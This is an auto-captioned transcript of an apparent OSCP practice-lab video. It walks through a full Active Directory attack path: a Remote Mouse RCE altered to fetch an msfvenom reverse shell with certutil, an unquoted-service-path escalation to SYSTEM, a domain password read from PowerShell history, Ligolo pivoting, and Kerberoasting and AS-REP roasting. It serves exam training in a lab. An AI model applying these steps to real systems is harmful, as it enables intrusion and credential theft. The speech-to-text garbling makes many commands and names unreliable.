OSCP Practice Lab: Active Directory Attack Path #1

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

hello everyone welcome thank you for joining so what I wanted to do here was document my active directory practice lab that I built as part of my ocp experience and this video is specifically going to be one of the easy quick attack methods that I practiced for getting ready for this component or this piece of the ocp exam what we have in front of you is you can see we've got our Cali box that's going to get VPN in and it's going to be handed to 17261 11 address and then across the VPN we'll be able to access the outside subnet the 1921 16800 and from there we'll be able to hit ms01 which is 2011 ms01 is a Windows 10 machine dual homed and the intention here is we're going to know that we have an initial Target of a Windows workstation to hit we're going to know that we have a subnet on the other side and on the inside subnet is going to be another Windows 10 workstation and a domain controller so these are named ms01 mso2 for the workstations and dco1 for the domain controller tried to make this relatively straightforward and is highly representative of what I expected to see on the active directory components of the lab so without further Ado let's kick things off and get started first and foremost I knew that I was going to have to VPN into a server of some sort and it was going to hand me access I believe they do call out that it's going to be an openvpn connection because they want you to be ready to get that o ovpn file so here I'm logging into my custom built openvpn server downloading my profile that I would have received credentials for as part of my my lab here we've got the profile let's go ahead and put that to get use let's blow this up a little bit I always like to be relatively organized so I'll start by just creating a couple folders one would be the active directory lab and then inside that let's make one for VPN and our targets ms01 mso2 and dco1 so here we can see our folders let's go into VPN and let's move that oh we have multiple files here let's move that profile to I'm going to guess it is actually you know what we're going to go with the 39 file and drop it into VPN oh really okay okay so here we'll go ahead and clear our screen and run openvpn sure enough there we go we are connected successfully 11.11 all right let's drop that out of the way at this point we're now connected we have our 1721 1611 address and we're connected to the VPN server we should be able to hit msl1 and begin our eneration so let's kick that off so often times the first thing I'll do is go into the folders actually that's not true first thing I'll do is add these to my host's record just or my host file just to make my life a little bit easier and use DNS names so let's do so 192 168 100. 2011 is going to be ms01 we know that the other ones 10 101. 202 is going to be mso2 and 10 10 1 200 is going to be dco1 go and save that and give it a test Ping 2 counts to msl1 well it doesn't look like it's going to respond to us but that could just be the firewall so we do see that the address translated to our IP so we at least know that that's working let's cancel that and now we're inside the msl1 folder but we're going to want to continue to stay organized so I'll create a couple more folders enu for enumeration so I'll keep a lot of the stuff like my logs for scans I run and then we'll create another one for loot in case we find any Goods like like our local. text or proof. text files that we know are we are expecting those are our flags that we need to pass the exam and let's do files if we find any files and exploits in case we need to download and work on any exploits so from here let's go ahead and run end map so we'll say pseudo nmap let's do dt4 cuz I want to do this quickly - p- against all the ports let's be ver Bose cuz I want to see very quickly what kind of progress we're making or if we're making no progress let's go ahead and and run this against ms1 and let's log this in the N map format to enu nmap dports dolog oh and right off the bat we can see yes while the server ms01 didn't respond to pings it does have 443 and 8 open and as soon as I see 880 or 443 open I'm immediately thinking we're going to want to also run gobster for some directory brute forcing so let's do that as well let's go and do action split vertically can watch both of these go simultaneously blow that up a little bit and bring that over so let's let let run go Buster dur as our Command URL is going to be HTTP ms01 and our word list so one of the common word list that I would start with is going to be dur Busters common word list there's also the big one and if you really want to be intense or or exhaustive or make sure and and be pretty foolproof I also like the SEC lists medium and uh the the medium directory and the medium files but let's not just leave this just on the screen let's split this off with t and let's also save the output to enu goster dp80 dolog so let's save our results as well oh and we already got some good stuff here so right off the bat we can see that's funny T actually looks like it takes out the color just for Giggles let's go Ahad and run this without T just CU that was pretty quick and now like a I get my pretty colors so in here we can see 403 we're not interested that's access denied 301 okay so we have a dashboard 200 fa favon okay image directory index.php file and oh okay and we have an uploads directory that is something I'm always interested in there's an uploads directory that tells me that there may be some juicy Goods there or we have the ability to maybe do some exploitation by uploading some content maybe some client side exploitation so it looks like our in map scan finished let's go back here so we've got Port 80443 we also found 1978 79 and 80 open let's see if we can fingerprint those those do not look familiar to me so instead of running just against all of the ports now that we've enumerated and we found what's open let's fingerprint those and let's also do some service enumeration so let's call this one services. log so we're going to save it as a new file and instead of running against all of the ports we're going to run against only 80 443 and 1978 to 1980 and let's also run our common scripts and version fingerprinting all right so there we went through discovered those ports are open and now it's running service scans so again let that bake come back over here let's look at what we found with gobster so first off let's do some manual enumeration we did find that ms01 okay so right off the bat we can see that it redirects to SL dashboard that tells us this is a default page tells us it's zamp for Windows so okay confirms Windows box we already know what services are running ooh PHP my admin nope but it does tell us Apache version open SSL versions and PHP oh okay yep sweet so we have PHP info one of the things I love about PHP info when people leave it enabled good old defaults is it also tells us about where it's installed so in this case if we yep there it is document route C drive zamp HT docs so right off the bat we have a pretty good understanding or a better understanding of some file structure and that this is a non-standard install as that it's not in C program files for example so this is helpful let's continue on so dashboard let's open that link takes us right back here so that's the one that we saw earlier all right how about images got two images uh that looks like a default image default image so those are just part of our welcome [Music] page what about okay we will see index redirects to dashboard so that's not helpful what about uploads yeah let's check out uploads hello here we can see we've got a file available to us that is fantastic so maybe this isn't something where we need to upload maybe this is something where we're doing some Discovery so we downloaded that file hey we created a files directory so let's go to our files directory let's move that file here and let's also do some enumeration on that so there's a program called XF tool that will take a look at the metad data of anything any files that you give it okay so this looks good we've got some info so while the file name is some random string we know it's a Windows 32 portable EX executable 32bit it's meant as a yep Windows gooey application hello this install was built with inos setup so this is an installation executable for Company software company made its remote Mouse file description remote Mouse setup hello and not only do we have a software name but we've got a version number this is really juicy oh so this is good stuff there's usually something I do next with this but looks like our end map scan finished okay this doesn't look like it printed out very well so let's do it clear this is why we save our stuff let's just do cat enu and map Services what did we find okay so Port 80 Apache 2456 443 Apache 2456 and welcome to zamp and welcome to Z so it looks like these are both the same web page same uh web capabilities same web server it's just running on two different ports and here we look at 1978 still don't know what it is but we did send a bunch of fingerprint strings to it and this is what we got in response so we still don't know what it is but it does respond and tell us something 1979 we don't know 1980 we don't know and we didn't have any responses from anything and here specifically we can see yes we have an unrecognized service on Port 1978 we sent a whole bunch of these strings time uh x86 64 PC Linux generic lines DNS version ldp string land Des we sent a bunch of things to it and every time it looks like it sent back the same thing which is what we're looking at here it's basically this SL X20 is a space so it's just this same response every single time all right so nothing super extravagant but we've got some unknown ports let's go back to the other thing that we found here which is this file so soon as we find a version what would we do with this right we want to know if this is some vulnerable software so one of the first things we might do is look in search sploit which is just the command line searchable index database for offline index for exploit DB so let's type in remote Mouse see if we get any hits okay we do get some hits let's be more specific then how about remote Mouse 3 how about remote Mouse 3 008 yes this is very specific not only that but we've got a local prives and we've also got a remote looks like remote command execution arbitrary remote command I like arbitrary remote commands means I can do what I want let's take a look at that so if we do let's go out of here into our exploits and let's go ahead and do search exploit dx4 6697 tell me more so remote Mouse 3 a fails to check for authentication and will execute any command any machine gives it wow that's very safe I love this this is looking very promising even tested on Windows 10 okay this script pops a cal as proof of concept albe it a bit slowly so that's something we need to keep in mind this may be a slow slow exploit that we need to be patient for it also has an index of key codes the app uses to communicate with the computer if you want to mess around with it yourself I love messing around with stuff myself that's okay this is fantastic and it's running on python 2 okay so it's old but that's fine we can run python 2 oh what is this so right off the bat there's defined in here we're seeing we're going to open up a socket we're going to connect to it on Port 1978 this is Port 1978 this is Port 1978 and we're going to get a response buffer it and basically a kilobyte it looks like if response equals that does that look familiar to you that looks familiar to me that looks like this so if the response is that return true otherwise return false accept so any exceptions we'll just assume it's a request timed out this is looking beautiful this looks like a match so let's kind of Breeze through this move mouse mouse press okay we've got some different Mouse options left click right click middle click oh we can middle click yay here looks like a dictionary of all of the different Keys we can send a b c okay here we go main so try grabbing the argument saving in his Target IP make an exception if you don't give me that and tell me please tell me what exploit and then an IP address if ping equals true which we saw earlier was looking it's not actually ping it's looking for this response then pop Cal with the target IP here is pop Cal what's he going to do it's going to move the mouse - 5,000 pixels 3,000 pixel this looks like moving to a corner then we're going to left click sleep for a second then send a string cal. XE sleep for a second and then SL end so that's probably like a return character like hitting enter on the keyboard right and then print success process Cal has run on target so if I were to guess this looks to me like it's going to move this maybe down to the bottom left corner hit the left Mouse button which if I were to move down to the bottom left Mouse button on on Linux it doesn't give us anything just the bottom left corner but on Windows what's in the bottom left corner that's the start menu so if I clicked on start and started typing in calc.exe it's just going to offer up calc.exe and then as soon as I hit enter it's going to open it so if I were to guess I would say that's exactly what it's doing it's clicking on start typing this out and then hitting enter so we can abuse this we don't want to open Calo what do we want to do we want to get an initial foothold how do we do that that well it's definitely not with Cal if this was a Linux machine we could use netcat or do some living off the land perhaps but in this case we probably need to generate a shell or generate a payload that will give us a shell so we can use msf venom for that once we have a payload how do we get it over there how do we execute that well can't really use what's one of the Native tools we could use one of my favorite tools is the certificate utility so we could use cert util and then have it transfer the payload from our Cali box right over to ms01 and then execute that payload which would then give us a reverse shell back to our Cali box so let's let's give that a shot let's see if we can do this so let's go ahead and download this exploit since it looks like a match and then let's go ahead and tweak it a little bit but first we need to build a payload actually we need to have something to serve up so make directory payloads let's go into our payloads directory because we may end up reusing these a few times let's create a reverse shell so if anyone's familiar with msf Venom that's one of our fwn tools that we love to use especially on the ocp let's create a payload it's going to be windows 64 bit and what do we want we want a shell we want a reverse TCP shell is what we want and where do we want to have it call back home to lhost Local Host in this case that's going to be our VPN IP 172 16 1111 what port do we want to call home to ooh okay that's a good question so we could use an arbitrary report like 4444 but we saw that ping wasn't responding earlier which indicates Windows Firewall is probably on so if we have it go back on just any random Port it's probably not going to be able to get through the firewall what ports do we have open or that we know are open through the firewall that we can take advantage of my money one of my favorites it's 443 right so let's and we know it's open because we can access the web server we scanned it with end map we know it's open so let's use 443 as our call back that should should get through the firewall what else do we need we need a format that's going to be in executable and we need to spit it out as a type of file instead of just raw payload so let's spit it out as Windows reverse Port 443 exe and if I didn't screw that up it should give us a pay and sure enough it does and I did not select the platform but it notics the payload does Windows I didn't select an architecture but it saw the payload 64-bit did not encode it so it is raw and sure enough we have a file saved as wi rev 443 beautiful now we need to be able to serve it up though how are we going to get it there let's just do a quick and dirty python you open up a module how about the web server module and run it on Port 80 boom we have a web server on Port 80 we're running right now on our Cali box how do we get it over there this is where we are going to abuse well we're going to modify this exploit if we jump down to line I don't know let's call it 120 oh that was that was pretty good actually here's our pop Cal here's where it's going to type in Cal I mean we want to move to the bottom left we want to click and and we wanted to wait for a second and open up the start menu we don't want to enter calc.exe though we do want to send a string how about instead of calc.exe we use that cert utility so cert u. exe helps if you can spell right there's no spell check on here Darren don't screw it up so let's do CT util let's do URL cache because we want to n-f we want to pull this over the network HTTP 17216 111 how about wi rev 443 exe is our name running out space here let's go and pull this over and we have to tell it where to save it so most folks like to save things in C drive Windows temp when rev 443 exe I don't though I actually prefer for if you were to fingerprint what are Darren's tactics that he likes to use he likes to be different so he'll use C drive users public because that's also a publicly writable location and let's close this it's actually whoops cancel that there we go so let's close that quote and then we need to tell it to go to the IP that should work and then we'll sleep we'll hit enter and it will download so let's save that let's do this one step at a time first and foremost we'll be able to see any progress on the left hand side let's go and clear this screen on our web server we should see the request come through let's do python 2 and our exploit and just check oh sure enough it's does not like what we've typed in here what did we miss line 119 with the comma does not like our comma let's go to line 119 so we've got send string sirer .exe Ro cash all that good stuff extra space we can get rid of that looks right oh Python 3 that's the problem python 2 Darren okay so python 2 works for us and it tells us we're missing a variable so let's go ahead and do python 2 well first all clear python 2 and MSO one here we go go we don't know if this is going to work if it's not going to work because we don't really get a lot of feedback and we also know it's going to take a while so the only indication we can look for is if our web server gets a request if it does we'll see it pop up in here if we didn't mistype anything and and it asks for the file that's available here we'll return a code 200 to say yes here you go here's the data if we see it's a code 404 that's telling us that we probably mistyped something and that it did make the request but we didn't have the right file or data or directory to serve up to the request so we'll see if this comes through here but as of right now it's at least running and sure enough there we go so this is fantastic this is exactly what we wanted to see get request for thewin rev 443 exe and we return to code 200 which means yes here you go so step one complete let's go and kill this web server clear that and let's edit our exploit step one complete download our payload step two [Music] is execute our payload so let's go ahead and comment that out but keep it around send string we're just going to change the string now right we're going to say now I want you to go back slash for the C drive users public win rev 443 exe send that to IP and then sleep and hit enter and then instead of saying process Cal has been run success victim has been pwned all right but we're going to need to catch that shell right so let's go aad and set up our listener good old netcat Dash listen perose No Name lookup and Port 443 all right we're list listening let's run this bad boy and hope for the best again be patient because feels like it takes time to probably move the mouse and then click these buttons if this was a real environment then we' be very much picked up on picked up by the end user on that machine seeing their Mouse move and then seeing characters being typed in that would be pretty apparent that something is wrong but being the ocp exam doesn't matter we know this is a head lless device and sure enough here we go success victim has been pwned that doesn't mean anything what does mean something is we've got a shell smell that nice fresh shell first thing that you do when you land on a new box right we can see it's Windows version 10 fantastic but the second question you ask is who am I ah okay so I am Lucy on msl1 so this confirms that we are a local account on msl1 not a domain account well the second thing we want to know is now that I know who I am I'm Lucy second thing I want to know is what privileges do I have right okay these are default privileges see those all the time but this one is not shutdown privilege so this actually means even though it says States disabled it actually means that the security privilege is not enabled so I actually have the ability to shut down the machine from a operational standpoint that may seem weird okay Darren you can shut down the machine it's not going to do you any good but what it also means is that if I want to exploit a service or scheduled task that occurs upon startup I may not have the privilege to execute that task or to restart that service but if I have the ability to re boot the machine through the shutdown command then actually I do have a ability to restart that task or that service so that's something to keep in mind and something to look for uh once you notice you have a certain privilege that stands out see if there's ways to take advantage of that now there's a number of different things that we would do through here like Run net user see if there's any other local users on here local group administrators tell me more about who has administ ative access on this machine oh okay so the domain admins have access well that makes sense that's a default but that also verifies this is a domain joined machine now there's a number of other commands that we could run and again as someone who's taking the OSP you should have your your short list or your cheat sheet or your reference material for all the commands to run but one of the ways to collect that a lot of that data quickly is to actually Leverage The P's in this case there's two versions there's Lin peas and win peas or on windows so you can guess we're going to want win peas now you can just Google this I will go to the GitHub go to the releases here and sure enough here's all of our versions LM peas wipas we're on a 64-bit Windows machine so we're going to use wipas x64 and when we go back over here let's go ahead and Stage this and transfer it over so instead of our exploits let's go back over here to payloads and let's move downloads win peas to here only we're just going to call it win.exe make things a little bit easier uh okay did I miss something oh okay thanks for that so we're going to rename that to win.exe okay so there we go now we've got it named win peas and we can see it's not hidden and we're going to go ahead and run our python web server again and we're going to grab this uh again I like to go back to C drive users public and then run here we can see our reverse shell payload let's add to this let's use this as our little repository so seert util exe URL cach F and HTTP 172 16 111 what we want we want win.exe and save it as win.exe sure enough it downloads it and we saw the 200 code here so now now we have wipas on our machine let's use this so again continue to do your manual enumeration but also don't forget to use the best tool for the job and supplement your manual searching for something like wind peas that will go through and dynamically automatically collect a lot of the same data you're going to do so use this to get the bulk of the data let's say at 90% And then manually enumerate the last 10% especially because you need to be efficient and time is not on your side you only got for the OSP 23 hours and 45 minutes so we're going to let this run again I would typically have two shells running so I'd run the exploit again have another shell open because you can have as many shells as you want right and then run wipas in one while it's running go ahead and do your manual enumeration in this case I'm going to pause the recording we're going to jump back in here in a couple minutes when this is done okay well while wind peas is running we have actually have enough data on here we can start to review some of this now I'm not going to review all of it if you're familiar with wipas Len peas you know that you get a ton of data so the key is again to know what to look for and how to look through it quickly so some of the key things we'll go back up here start at the top anything in red generally worth looking at that that's a high high item to evaluate anything else you want to look for specific things so since System Info this is great confirms things like the domain name OS cp. laab fantastic tells us a little bit more about the machine confirm some of the things that we already knew if you do in this case get some vulnerabilities powered by love you Watson then they're worth looking at or keeping in your back pocket if you've tried everything else and you've enumerated everything else and you haven't found anything kernel exploits or Windows kernel exploits are always fantastic options and in some cases if you're familiar with some of them you may immediately say oh this is worth valuating this might be viable otherwise hit and miss I would say in my experience more Miss now as we go through here great system environment variables worth looking at nothing stands out there laps is not installed LSA credential guard cach logons that's always good and interesting when we have cash logons that's potential that once we get admin we can look for some credentials uh prompting for Windows binaries we don't have any Powershell history so can't gather anything there some of these checks require admin privileges which we do not have some of these uh okay land man compatibility ntlmv2 so that tells us what kind of passwords we can get is only ntlmv2 so we need to be able to crack them we're not going to be able to not going to be able to uh pass them if we gather them by just the hashes themselves pipes all this good stuff I would would normally start to evaluate okay users oh local admin is disabled so that's not helpful Lucy's on here not seeing any other users so looks like we're going to need a domain user if we want to elevate privileges or we're going to have to exploit something because there's no local admins that we can take advantage of either at least not that are enabled uh okay here we go ever logged on users we have another user an ocp domain user called wild style okay I like it sounds like a Lego theme maybe Lucy wild style so this is something to search for and this is confirmed when we look at home folders there's a wild style folder as well Auto log on credentials we can see Lucy is there and as we go through this so processes are interesting see if there's anything red that jumps out wind peas well that's because we're running it so that's why we get the ability to hijack our own process same thing with the reverse shell uh so one drive interesting but that's again our one drive so not helpful vulnerable leaked handles you'll get a ton of stuff here that's not really helpful at all it's just a bunch of noise so we scroll through this and as we get down so the next section is services so this is an area where we definitely wanted to pay some attention as well because we saw earlier we could shut things down or do the restart shutdown permission so okay possible D hijacking with Apache CU we can write and create files may or may not work remote Mouse service no quotes in space detected okay so an unquoted service there maybe and oh here we go though wise boot assistant here we see no quotes and space detected and we also have file permissions and that we can write data create files so this looks like the better option we don't have those kinds of permissions up here so this looks like something we want to take advantage of so how would we take advantage of this how could we how could we exploit this if you answered well we want to create an executable called apps wise wise. exe that's going to get executed before it looks into y care 365 for something else so that's what we need to do well how can we take advantage of that we can create another payload or we can take advantage of the fact that we already have a payload there ready to use so let's see if we can do that let's go ahead and change so here we have our wind rev 443 let's go ahead and move to the C drive here we can see we've got apps set up ooh anything under setup yeah Auto log on that's not cool not helpful Z amp which we saw earlier and then apps so let's go into our apps where we saw that there is the wise directory but where things diverge this is where we're going to take advantage of the space we're going to say copy users public is it when rev 443 exe to here and we're going to call it y.exe so now sure enough we had permission to do it it let us so we've got a wise. exe so well we don't have the ability to restart that permission cuz we're just a limited user what we can do for sure is restart the box and have a listener at the ready and instead of being Lucy because this is running as well did we see we did not see actually so let's go and clear the screen here and get rid of some of this clutter CLS I guess that doesn't really work on down here we can do this so we can use the good SC for service control and I believe it's QC to look at the configuration of what was it y something QC can we do an asterisk of course not then that's fine in that case how about just SC talking about SC query okay so SC query and then we can do SC query Finster I don't care about case wise there it is wise boot assistant so SC QC wise boot assistant boom there we go okay so here we can see we should get a shell as local system that is exactly what we want we want to get elevated so fingers crossed let's go ahead and stop here and what we'll do is we're going to kill this and open up a listener as quick as possible so we'll say shut down reboot in 1 second do it uh and we got dropped so really quickly same thing we're going to listen and hope for the best we should get a [Music] shell oh yeah this is what we wanted to see sure enough we got a new Fresh shell and what's the first thing we do when we get a fresh shell who am I bam we are system on Ms o1 we just got admin access so at this point I would typically go ahead and and pill for the loot because now we have full access as the local user uh Lucy what I forgot to do what we should do is we should have looked for our local. text because the limited user should have a local. text but as admin we should be able to find the admin loot which is the proof. text so let's go ahead and do that first and foremost so I'll start by just going to the root directory usually under users because these files are supposed to be on Windows underneath folks desktops here we can see we've got admin Lucy wild style of course the default public let's just do a quick search for our files though so we'll do SL s/b and we're looking for local. text yes and sure enough it actually was under Lucy's desktop again manual enumeration which we should have been doing concurrently with wipes would have found that so let's go ahead and type that out paste selection boom there's our loot for local. text so let's go ahead and save that msl1 loot and let's just Echo paste selection into local. [Music] text sure enough there we go now let's find our admin loot so SL SB slsb I don't know why that's so hard for me to say and we're looking for proof. text Absol absolutely just as expected admin desktop as it is supposed to be if it exists on the exam so let's go ahead and type that out and sure enough there we go we're cooking that is our proof. [Music] text yeah buddy now we're making progress we got our loot we would definitely also then do if this was the exam what we should be doing is gathering both of these and then typing in who am I and ip config and then I also for good measure just like to type in host name and then you would grab a screenshot oops I wanted to make it smaller well anyway we would grab a screenshot of this so that there we go that's what I was shooting for screenshot all of that and that would be your proof for submission of those two and you would also submit these hashes with the corresponding IP address in the submission form so with that being said we have just not only gotten an initial foothold on msl1 but we have also gained local admin access admin access on msl1 we haven't gotten into the active directory components yet we still need to pill for that and figure that out but we've at least gotten the ability to start leveraging that admin access to enumerate more of msl1 and look for some active directory crumbs that will allow us to start to enumerate more internally the other thing we can do is we can create a pivot point we should definitely do that so first and foremost let's now that we see we've got our dual homed machine let's continue to enumerate and then after that let's create our pivot and then we can use that pivot to enumerate further with that I'm going to go ahead and clean some of this up and we can clear this and we're good to go back in action oh and one thing that we definitely or I definitely forgot to do is take good notes I've been doing that on the side here I've not been doing that while we've been working in Cali so let's take my notes so typically as you're going through and doing the ocp exam and as you're practicing you should be taking plenty of notes we'll just open mouse pad let's go a and use that drop in my notes I've been taking on the side so first and foremost right we have enumerated let's move this around let's minimize that so first and foremost we know what our hosts are and we typically would have known this based upon again the submission portal and the control panel where we can reboot the hosts reset them and also where we are going to submit our flags so things to try uh this is as we begin it as we continue enumeration and as we find potential vulnerabilities or new things that we need to enumerate further this is where we list those things to try out open ports well we've scanned msl1 so far and this is what we've found and then the path to compromise I always like to keep a log of okay how have things progressed What's the storyline been like or if I were to build a timeline what would that look like so here we can see we found that web server on msl1 with a file that was an executable we downloaded that file and the metad data revealed that we had mobile Mouse 308 software potentially installed and we noticed that it listens on a port that actually happens to be open as well and it's vulnerable to unauthenticated remote code execution we then exploited that vulnerability and used it to download a payload and obtain a reverse shell as Lucy and and we used wipas at that point and it revealed that the wise boot assistant service was there and it was vulnerable to an unquoted service path attack and we use that to obtain a privileged reverse shell and at this point what we should be doing is leveraging that shell to continue further enumeration so our next step would be further enumeration of ms01 with the intention of finding active directory breadcrumbs something to allow us access to active directory because at this point we're on msl1 and we should be able to Ping and and reach around internally but we don't have even credentials to query services on dco1 or mso2 so nothing that we have with Lucy or local system credential local system access is going to allow us to get any internal access to active directory so with that let's continue to enumerate and on here let's normally we would go through our processes we would do some manual enumeration I immediately saw earlier and one of the things I would start to work with is looking in the users directory and noticing and we saw this earlier that there was a previously logged on user of wild style that's a domain user well as a local admin or with someone with local admin access with our privileged shell we can actually go into wild styles directory and see inside everything looks normal one command I I like is tree and I believe the flags are yeah slf SLA here it shows us there's basically nothing here if we had a file underneath it would it would enumerate and show further so in this case not seeing anything jump out but there are hidden directories in here as well so let's just do a quick search let's look for any one of the first things I'll look for is text files is there any log [Music] files okay and there's a Powershell log file and I'll also look for are there any text files same thing so we're seeing somebody was using some Powershell usage let's check that out I'm immediately going to prioritize someone's command history with Powershell so let's type that out tell me what's been going on what has wild style been doing and we struck gold here so we can see they were obviously running some commands like ip config and host name but then this looks like a remote PS session they tried to run a poell Powershell session over to another machine called MSO 3 which doesn't exist or didn't exist at the time of this obviously we only have ms12 but they tried to or did connect to ms03 with these credentials and we can see they use the username wild style and that well this is wild Style's password so at this point we need to update our information we got some new stuff we found our active directory breadcrumbs uh again normally would have spent a little bit more time doing some further enumeration wouldn't typically find this very quickly although one of the first things I will do is start to find any additional user data or user history that I that stands out upon looking at win pe's logs so this point we found wild styles credentials in Powershell history on ms1 so at this point let's go and save this and let's drop this into our desktop active directory lab and we're going to call this notes oops there we go so at this point now we need to do our next step and we also need to add in we've got open ports what else have we discovered [Music] credentials so we have ms1 Lucy hash that's in the wipas log there we can go back to our console history if we need to we also now have ocp SL wild style and that oops is awesome 24 exclamation or bang let's copy that add that save our notes what would we do next now that you got some credentials what would you do I know what I like to do I like to immediately start to use that to enumerate further active directory credentials and users and information there's a few ways we can do that but let's just go ahead and Mark this down enumerate active directory further with wild style so at this point let's go ahead actually let's go and clear our screen old school way let's save this shrink that [Music] down well at this point you're probably wondering what's next how do we get access to this inside network from our Cali box when right now we can only get access to msl1 and the answer to that is is well there's could be a couple different answers but one of my favorite favorite answers to that is piece of software called leolo n g this is a fantastic pivoting tool that allows us to essentially assign well create an interface and then leverage that interface for our pivoting so let's go ahead and download this and we're going to need two things we're going to need the agent that's going to run on our victim so we'll want the windows 64bit and the other thing we're going to need is the proxy which we're going to run in our server or Cali in this case so we'll go with the Linux 64bit at this point let's go ahead and follow the instructions here and get it set up it's actually pretty easy so from here let's go and bring this over actually let's go and go to our downloads directory here we have our files and let's just go ahead and [Music] extract and there's our agent so we're going to move that to our desktop and payloads the other file we're going to need believe in this case it's going to be this gunzip file so is it gzip yeah so in this case we want d d there's our tar so in this case was it untar tar X VF sure enough there's our proxy file let's go a and move that because that's what we're going to run on our Linux box let's go ah a and remove that remove that to our bin directory so Pudo move proxy user [Music] bin now let's go and remove all [Music] this and let's go ahead and make sure we have our proxy boom all right all right so things are looking good let's go ahead and follow our setup guide here so first thing we're going to do is the creating an interface in this case it's mode ton the [Music] goo then we're going to go ahead and set it to the up status pseudo IP Link set goo up all right so now our interface has been created and it's up so if we were to do if config you can see there's t zero oh it wouldn't in this case sorry Lolo okay so now at this this point we need to actually get the agent to connect and then we can continue on so let's go ahead so now what we need to do is let's go ahead and get the agent file moved over to our victim so let's go ahead and go back to our payloads directory create our [Music] python web server so now we can serve up agent and let's go ahead and transfer that over again I like to put it in my public directory so we'll do CT util URL [Music] cache we're going to transfer agent.exe uhoh helps if you can spell let's try that again much better all right so at this point now we've got the agent ready we need to create our server proxy so we'll stop our web server and in this case let's go ahead and run our proxy server so we'll say proxy D selfer and boom Lolo server is up and running and it's listening on 11601 so now on this side we'll say agent.exe [Music] and Das connect 11601 we'll say retry and ignore search boom look at that anti Authority system on msl1 has connected so now if we type in session it says which session would you like well we want the only session we got let's do number one and here we are on there so now at this point we could type in if config we can see we've got our 1011 2011 interface as well as our outside interface so now all we have to do is type start and boom we have started that tunnel and it is accessible to us we have one last thing that we need to do which is of course assign routing how are we going to get there we need to tell our box how to get there so let's just go ahead and do this so we've essentially got the agent running and we can see any status messages here got the server running and the tunnel created so let's just minimize this let's create another terminal session and at this point let's go ahead and do some further enumeration we should be able to Ping for example the DC so let's pick on DC co1 it's a good place to start make a folder called enu loot files [Music] exploits and for giggles at this point well actually before we do our Giggles first we need to add that route so we'll say pseudo IP route add 1011 024 where do we go we send it to our Lolo interface oh and it would help if we can spell [Music] correctly boom here we can see this has been added and we should for example send two packets to dco1 ah there we go we are in business for Giggles let's see if mso2 responds and surprisingly it does not it most likely has its firewall but we can see that we at least have connectivity and routing so let's start enumerating now that we can enumerate what do we going enumerate well we need to enumerate the services right so let's go back to our n map - t4- P Das actually in this case well because we know we're going to have lots of ports open on the domain controller we'll do common scripts and version fingerprinting across all those ports but let's not do it across all of them only run scripts and version fingerprinting on ports that are open please and we're going to run it across dco1 and let's log that to enu nmap ports versions log and we're going to go ahead and oh you know let's add just for Giggles Dash V because I would also like to see what's going on and right off the bat we can see we've got ports open so we'll let this bake actually I take that back we're going to work concurrently right we're not just going to do this against dcl1 let's split vertically and let's run a concurrent one against mso2 so similarly we can go ahead and say make directory enu files loot exploits pseudo nm- t4- p- dcv DV mso2 save the output and map ports versions. log and yep that looks good Let It Bake and sure enough yep we at least found 135 is open all right we'll come back to this shortly actually as I'm noticing this running one of the reasons why I like verbose is we can already see we've got Port 445 open which is SMB so let's while we've got these guys running let's continue by we're going to split this again so we'll move this over we'll be on this side and let's split vertically and while those are running on this side let's go go ahead and check out SMB so SMB client is a fantastic application we can use here let's just do list dco1 user is going to be wild style because we know wild Style's password and oh but it did work group so let's change that [Music] awesome 24 bang and yes so default default those are all defaults but that's not a default let's take a look at that backups what's a backup share I like backups please tell me more let's connect to that so Dash L was listing it this case let's actually take a look all right so we're logged in oh no access denied okay so while yes this does exist we do not have access to it all right how about we do the same thing on mso2 nope okay so no SM shes well we haven't seen anything pop open there so that makes sense actually according to this our scan is done there is only Port 135 open let's go ahead and [Music] Cat sure enough just 135 so there's not much that we can do with this F unfortunately so what else can we do we're going to have to attack dco1 more than more than mso2 currently actually you know what that doesn't feel right it's got to have more than that let's run that scan again only in this case we're going to take off T4 let's go a little bit more slowly see if we pick anything up maybe we were too quick that okay so we're going to run that and yeah I wonder if this was because we're running too many end map scans at the same time or maybe I was too aggressive with the T4 but here we can see we did catch some additional ports like 445 so let's try this again let list what shares are available okay there we go see this goes to show you can never it never hurts to double check or go back and recheck things especially just doing the due diligence of making sure you get the same results twice so here we can see there is a non-default share called setup can we access that maybe we couldn't access to anything on dco1 but maybe we can access this share on mso2 let's give it a shot aha we did what do we see ah nothing of value just the auto log on executable that would probably used to set up an auto log on so this is not helpful at all although it does at least let us know that we have SMB access so we could potentially take advantage of that with something like PS exec once we get some credentials that have admin privileges on that machine or potentially if we get additional credentials we could authenticate and see if there's a different listing of shares other than that it looks like the next thing that I would typically do at this point is try and get some credentials for free what do you mean by that well what I mean by that is once you have valid active directory credentials We can spray those credentials against dco1 or any active directory domain controller as part of the domain and see if there's any Kerber roastable users or any asre roastable users and the intention here is that we will get hashes for free because these are exposed accounts that are intended to give us well that are intended to provide services such as having a service principal name attached so where are we at well we enumerated we found dco1 and we also mso2 mso2 seems to have 139 one actually I should have said 135 139 and 445 and we saw that 445 does have a setup share on dco1 we have quite a slew of ports open looks like this is still running but we can tell we've got quite a few SMB is the one that we immediately picked up on so [Music] let's at least call that out we've got 44 well we've got 20 25 it look like oh no not SMTP 53 we had DNS and then 445 those are the two quick and easy [Music] ones on here we had a backups share no access we should say authentication denied so far empty just an auto log on file okay so now things to try let's try curb roasting let's start with that and then let's also try as rep roasting so grab another shell just because I like to have as many as many terminals open as possible so go to our desktop dco1 just so that I know where I'm at and in this case we can use some of our impacket tool set so if we do impacket in this case get user [Music] spns of course it's going to give us all these options what we really want is it's going to be our Target and our username so we're going to do ocp wild style at dco1 let's see what we get thank fingers crossed actually I think one thing we missed is we're probably going to need to do the DCI IP DC IP do 10 10 1 [Music] 200 let's start over so should be impacket get user spns in this case what we should have been doing was oh yep there it is so we're making a request which I mentioned and then who are we sending it to or who's the IP for DC it is dco1 who are we we are wild style let's try that uhoh did we miss something oh yeah ocp what [Music] dolab boom there we go syntax is everything so this is what we were shooting for don't forget that's something we enumerated earlier right it wasn't just OSP it's oc. laab and we got some goodies we essentially found that the servicecore user has a service principal name attached to it this guy and sure enough that means that we can query and get its hash so we now have a hash we need to save so let's take this and let's copy and let's save [Music] and if we do hash [Music] ID oh actually does not recognize it that's funny but we hopefully can crack this now that we have that let's go ahead and see if we have any rep roastable users so for rep roastable users that's essentially not checking for Kerberos preo so similarly it's going to be in the impacket tool set but we can also Al use get in this case user or no NP users similarly similar syntax right so- request DCI dco1 and ocp p. laab slw style let's see if we got any Repro oh we do hello okay so metal beard is rep roast able so in this case let's go ahead and copy this curb 5 as rep and let's go ahead and go back into our actually we'll 